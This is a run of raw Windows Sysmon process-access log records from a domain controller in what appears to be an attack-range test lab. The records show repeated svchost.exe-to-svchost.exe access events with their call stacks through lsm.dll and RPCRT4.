12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.426{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 